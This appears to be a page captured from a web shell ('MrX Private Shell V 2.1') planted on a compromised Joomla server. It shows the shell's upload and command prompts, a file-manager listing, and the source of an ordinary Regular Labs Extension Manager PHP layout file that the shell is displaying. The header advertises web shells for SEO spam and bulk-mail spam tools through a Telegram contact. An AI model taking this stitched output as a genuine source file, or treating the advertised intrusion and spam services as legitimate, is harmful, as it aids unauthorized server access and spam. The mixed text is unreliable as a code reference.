__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php
/**
 * @package         Regular Labs Extension Manager
 * @version         9.1.0
 * 
 * @author          Peter van Westen <[email protected]>
 * @link            https://regularlabs.com
 * @copyright       Copyright © 2025 Regular Labs All Rights Reserved
 * @license         GNU General Public License version 2 or later
 */

defined('_JEXEC') or die;

use Joomla\CMS\HTML\HTMLHelper as JHtml;
use Joomla\CMS\Language\Text as JText;
use Joomla\CMS\Layout\LayoutHelper as JLayoutHelper;

extract($displayData);

/**
 * @var   object  $items
 * @var   boolean $show_action_buttons
 */

if (empty($items))
{
    return;
}

$show_action_buttons ??= true;
$add_type_links      = false;
?>
<table class="table">
    <thead>
        <tr>
            <th scope="col" class="w-1">
                <?php echo JHtml::_('grid.checkall'); ?>
            </th>
            <?php echo JLayoutHelper::render('head_name'); ?>
            <th scope="col rl-w-9em">
                <?php echo JText::_('RLEM_VERSION'); ?>
            </th>
            <?php echo JLayoutHelper::render('head_actions'); ?>
        </tr>
    </thead>
    <tbody>
        <?php foreach ($items as $item) : ?>
            <tr data-state="not_installed" data-extension="<?php echo $item->alias; ?>">
                <td>
                    <label for="cb<?php echo $item->alias; ?>"><span class="visually-hidden">
                            <?php echo JText::_('JSELECT'); ?>
                            <?php echo $item->name; ?>
                        </span></label><input
                        class="form-check-input" autocomplete="off" type="checkbox"
                        id="cb<?php echo $item->alias; ?>" name="extensions[]"
                        value="<?php echo $item->alias; ?>"
                    >
                </td>
                <?php echo JLayoutHelper::render('row_name', compact('item', 'add_type_links')); ?>
                <td>
                    <?php echo JLayoutHelper::render('version', [
                        'item'    => $item,
                        'version' => $item->version,
                        'class'   => 'success',
                    ]); ?>
                </td>
                <td class="text-right">
                    <?php if ($show_action_buttons) : ?>
                        <?php echo JLayoutHelper::render('button.install', compact('item')); ?>
                    <?php endif; ?>
                    <span class="d-none d-md-inline">
                        <?php echo JLayoutHelper::render('button.download', compact('item')); ?>
                        <?php echo JLayoutHelper::render('button.link', compact('item')); ?>
                    </span>
                </td>
            </tr>
        <?php endforeach; ?>
    </tbody>
</table>

Filemanager

Name Type Size Permission Actions
broken.php File 2.33 KB 0664
installed.php File 1.97 KB 0664
no_access.php File 3.81 KB 0664
not_installed.php File 2.72 KB 0664
updates_available.php File 3.93 KB 0664
Filemanager